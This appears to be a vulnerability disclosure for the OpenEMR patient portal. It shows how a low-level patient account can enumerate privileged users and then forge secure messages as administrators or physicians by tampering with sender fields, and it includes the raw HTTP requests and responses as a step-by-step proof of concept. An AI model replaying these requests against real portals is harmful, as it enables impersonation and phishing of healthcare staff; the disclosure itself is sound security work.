Description

Due to the lack of an authorization check when sending secure messages, an attacker with access to a low level patient account in the portal can impersonate other users when sending secure messages. This would allow a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages and can lead to legitimate looking social engineering and phishing attacks.

Proof of Concept

Step 1. Login to the patient portal using a low-level patient account
Step 2. Using a tool such as BurpSuite, capture the following request and view it’s response. The response will contain important account information about privileged users and their accounts.

# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
(...snippet...)
Te: trailers
Connection: close

#Response
HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]

Step 3. Now go to the ‘My Messages’ section and craft a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id,recipient_name,sender_id,sender_name parameters with information acquired from step 2. For example, send a message from the admin account to another high privileged user.

POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
(...snippet...)
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
(...snippet...)
Connection: close

title=Test&csrf_token_form=a6d7d772289b2d6083009d0dd9d6aab52da81ca5&noteid=&replyid=&recipient_id=physician&recipient_name=Donna+Lee&sender_id=admin&sender_name=Billy+Smith&task=add&inputBody=%3Cp%3EThis+is+a+test.%3C%2Fp%3E%0D%0A&pid=&submit=messages.php

Step 5. Release this altered request and the victim will receive your impersonated secure message. High-level users will receive this message in the “Secure Messages” section even if they do not usually have access to this feature. (A portal icon will appear in the top right corner of their screen)